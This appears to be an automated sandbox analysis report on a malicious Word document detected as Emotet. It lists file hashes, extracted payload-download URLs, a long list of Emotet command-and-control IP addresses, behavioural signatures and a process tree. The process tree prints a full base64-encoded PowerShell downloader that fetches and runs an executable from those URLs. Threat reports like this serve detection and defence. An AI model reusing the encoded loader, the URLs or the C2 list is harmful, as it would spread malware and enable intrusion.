Analysis
-
max time kernel
134s -
max time network
151s -
platform
windows10_x64 -
resource
win10 -
submitted
02-08-2020 07:36
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Exploit.Siggen2.13664.14938.7490.doc
Resource
win7v200722
General
-
Target
SecuriteInfo.com.Exploit.Siggen2.13664.14938.7490.doc
-
Size
173KB
-
MD5
9dc6c15bd5cadbea76473ca0a61270d0
-
SHA1
a1e18ac08b98c88a49da1b8afa527468a102fd0d
-
SHA256
56916942bc59a1ae0cc030beaf907b54631390e0a5fa7d75bce1f120df88d843
-
SHA512
ef06ec05fa2463a2f32defb87d796ff0fb88d3d9c8f2169b19683b6620e4e18dab86b69ae8649d59d2cc280293ec1f070443e9d69ad7018b20fee14a789f05a4
Malware Config
Extracted
http://prolicitar.com.br/privilege/VwWMjYDU/
http://proreclame.nl/assets/Riw/
http://www.meltonian.net/Blog/Zaviixl730/
http://www.mollymoody.com/iRVKRMq/
https://mwrouse.com/cs2300/qVJaPCy/
Extracted
emotet
187.64.128.197:80
198.57.203.63:8080
163.172.107.70:8080
212.112.113.235:80
157.7.164.178:8081
181.167.35.84:80
212.156.133.218:80
185.142.236.163:443
181.143.101.19:8080
75.127.14.170:8080
115.165.3.213:80
190.55.233.156:80
139.59.12.63:8080
144.139.91.187:80
37.70.131.107:80
181.113.229.139:443
41.185.29.128:8080
177.37.81.212:443
5.79.70.250:8080
78.188.170.128:80
190.111.215.4:8080
50.116.78.109:8080
75.139.38.211:80
140.207.113.106:443
192.241.220.183:8080
192.210.217.94:8080
81.17.93.134:80
181.164.110.7:80
190.164.75.175:80
201.214.108.231:80
94.96.60.191:80
192.163.221.191:8080
91.83.93.103:443
51.38.201.19:7080
24.157.25.203:80
81.214.253.80:443
87.106.231.60:8080
37.46.129.215:8080
195.201.56.70:8080
201.235.10.215:80
107.161.30.122:8080
113.160.180.109:80
87.252.100.28:80
115.79.195.246:80
113.161.148.81:80
74.208.173.91:8080
46.105.131.68:8080
172.105.78.244:8080
189.146.1.78:443
216.75.37.196:8080
203.153.216.182:7080
153.220.182.49:80
181.134.9.162:80
178.33.167.120:8080
46.49.124.53:80
143.95.101.72:8080
77.74.78.80:443
203.153.216.178:7080
179.5.118.12:80
24.232.36.99:80
177.144.130.105:443
46.32.229.152:8080
89.108.158.234:8080
Signatures
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powersheLL.exedescription pid process Token: SeDebugPrivilege 1056 powersheLL.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powersheLL.exenetlogon.exepid process 1056 powersheLL.exe 1056 powersheLL.exe 1056 powersheLL.exe 2892 netlogon.exe 2892 netlogon.exe 2892 netlogon.exe 2892 netlogon.exe 2892 netlogon.exe 2892 netlogon.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
751.exedescription pid process target process PID 2152 wrote to memory of 2892 2152 751.exe netlogon.exe PID 2152 wrote to memory of 2892 2152 751.exe netlogon.exe PID 2152 wrote to memory of 2892 2152 751.exe netlogon.exe -
Executes dropped EXE 2 IoCs
Processes:
751.exenetlogon.exepid process 2152 751.exe 2892 netlogon.exe -
Emotet Payload 4 IoCs
Detects Emotet payload in memory.
Processes:
resource yara_rule behavioral2/memory/2152-14-0x0000000000720000-0x000000000072C000-memory.dmp emotet behavioral2/memory/2152-14-0x0000000000720000-0x000000000072C000-memory.dmp emotet behavioral2/memory/2892-17-0x0000000000540000-0x000000000054C000-memory.dmp emotet behavioral2/memory/2892-17-0x0000000000540000-0x000000000054C000-memory.dmp emotet -
Drops file in System32 directory 1 IoCs
Processes:
751.exedescription ioc process File opened for modification C:\Windows\SysWOW64\PlayToReceiver\netlogon.exe 751.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious use of SetWindowsHookEx 11 IoCs
Processes:
WINWORD.EXE751.exenetlogon.exepid process 3020 WINWORD.EXE 3020 WINWORD.EXE 3020 WINWORD.EXE 3020 WINWORD.EXE 3020 WINWORD.EXE 3020 WINWORD.EXE 3020 WINWORD.EXE 3020 WINWORD.EXE 3020 WINWORD.EXE 2152 751.exe 2892 netlogon.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 3020 WINWORD.EXE 3020 WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powersheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1056 4020 powersheLL.exe -
Blacklisted process makes network request 2 IoCs
Processes:
powersheLL.exeflow pid process 16 1056 powersheLL.exe 18 1056 powersheLL.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen2.13664.14938.7490.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
-
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL -e JABWAE0AQgBBAE8AaABvAHcAPQAnAEEASgBEAFEAUwBrAHMAdQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYwBVAGAAUgBJAGAAVAB5AHAAYABSAE8AVABPAGMAYABPAGwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABIAFAATABCAEkAYQB6AGcAIAA9ACAAJwA3ADUAMQAnADsAJABNAEwASgBUAFoAeQB4AGgAPQAnAFcATABMAFkATQBkAGUAZgAnADsAJABXAEgATgBDAFcAYwBqAHIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEgAUABMAEIASQBhAHoAZwArACcALgBlAHgAZQAnADsAJABWAFQARgBOAEEAdwBqAGkAPQAnAFEAVwBBAEoATgBoAHAAdAAnADsAJABIAFcAVQBTAEMAcgBxAGEAPQAuACgAJwBuAGUAdwAnACsAJwAtAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgAE4ARQB0AC4AdwBlAGIAQwBsAGkARQBuAHQAOwAkAFAASQBMAEQAUQBzAGYAeAA9ACcAaAB0AHQAcAA6AC8ALwBwAHIAbwBsAGkAYwBpAHQAYQByAC4AYwBvAG0ALgBiAHIALwBwAHIAaQB2AGkAbABlAGcAZQAvAFYAdwBXAE0AagBZAEQAVQAvACoAaAB0AHQAcAA6AC8ALwBwAHIAbwByAGUAYwBsAGEAbQBlAC4AbgBsAC8AYQBzAHMAZQB0AHMALwBSAGkAdwAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AZQBsAHQAbwBuAGkAYQBuAC4AbgBlAHQALwBCAGwAbwBnAC8AWgBhAHYAaQBpAHgAbAA3ADMAMAAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AbwBsAGwAeQBtAG8AbwBkAHkALgBjAG8AbQAvAGkAUgBWAEsAUgBNAHEALwAqAGgAdAB0AHAAcwA6AC8ALwBtAHcAcgBvAHUAcwBlAC4AYwBvAG0ALwBjAHMAMgAzADAAMAAvAHEAVgBKAGEAUABDAHkALwAnAC4AIgBzAGAAUABMAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAE0AUwBCAEIAUQBhAHoAegA9ACcATwBMAFEATgBPAGYAdgB5ACcAOwBmAG8AcgBlAGEAYwBoACgAJABZAFQATQBYAFQAZQB6AHMAIABpAG4AIAAkAFAASQBMAEQAUQBzAGYAeAApAHsAdAByAHkAewAkAEgAVwBVAFMAQwByAHEAYQAuACIARABgAG8AVwBuAGwATwBBAGAARABmAGkAYABMAEUAIgAoACQAWQBUAE0AWABUAGUAegBzACwAIAAkAFcASABOAEMAVwBjAGoAcgApADsAJABFAFkATABOAEsAcgBpAGgAPQAnAE8ATgBYAEUASgB0AHAAcgAnADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFcASABOAEMAVwBjAGoAcgApAC4AIgBMAGUAYABOAEcAdABoACIAIAAtAGcAZQAgADIAOQA2ADAANAApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwBSAEUAYABBAHQAZQAiACgAJABXAEgATgBDAFcAYwBqAHIAKQA7ACQAVQBEAEYATwBBAGIAdQB3AD0AJwBEAEgAVgBPAFAAZwBrAHUAJwA7AGIAcgBlAGEAawA7ACQAWQBJAEsAUwBKAG8AawBtAD0AJwBKAEMAWABYAFcAdAB6AGUAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWQBLAEsATABQAHUAagBkAD0AJwBUAFoASQBYAFkAeQBsAHMAJwA=1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Process spawned unexpected child process
- Blacklisted process makes network request
-
C:\Users\Admin\751.exeC:\Users\Admin\751.exe1⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\PlayToReceiver\netlogon.exe"C:\Windows\SysWOW64\PlayToReceiver\netlogon.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\751.exe
-
C:\Users\Admin\751.exe
-
C:\Windows\SysWOW64\PlayToReceiver\netlogon.exe
-
memory/2152-14-0x0000000000720000-0x000000000072C000-memory.dmpFilesize
48KB
-
memory/2892-17-0x0000000000540000-0x000000000054C000-memory.dmpFilesize
48KB
-
memory/2892-15-0x0000000000000000-mapping.dmp
-
memory/3020-6-0x0000020B064AD000-0x0000020B064B2000-memory.dmpFilesize
20KB
-
memory/3020-10-0x0000020B08CE9000-0x0000020B08CFD000-memory.dmpFilesize
80KB
-
memory/3020-11-0x0000020B08CE9000-0x0000020B08CFD000-memory.dmpFilesize
80KB
-
memory/3020-9-0x0000020B08CE9000-0x0000020B08CFD000-memory.dmpFilesize
80KB
-
memory/3020-8-0x0000020B08AEE000-0x0000020B08B58000-memory.dmpFilesize
424KB
-
memory/3020-7-0x0000020B08AEE000-0x0000020B08B58000-memory.dmpFilesize
424KB
-
memory/3020-0-0x0000020B08520000-0x0000020B08524000-memory.dmpFilesize
16KB
-
memory/3020-5-0x0000020B08AEE000-0x0000020B08B58000-memory.dmpFilesize
424KB
-
memory/3020-4-0x0000020B08AEE000-0x0000020B08B58000-memory.dmpFilesize
424KB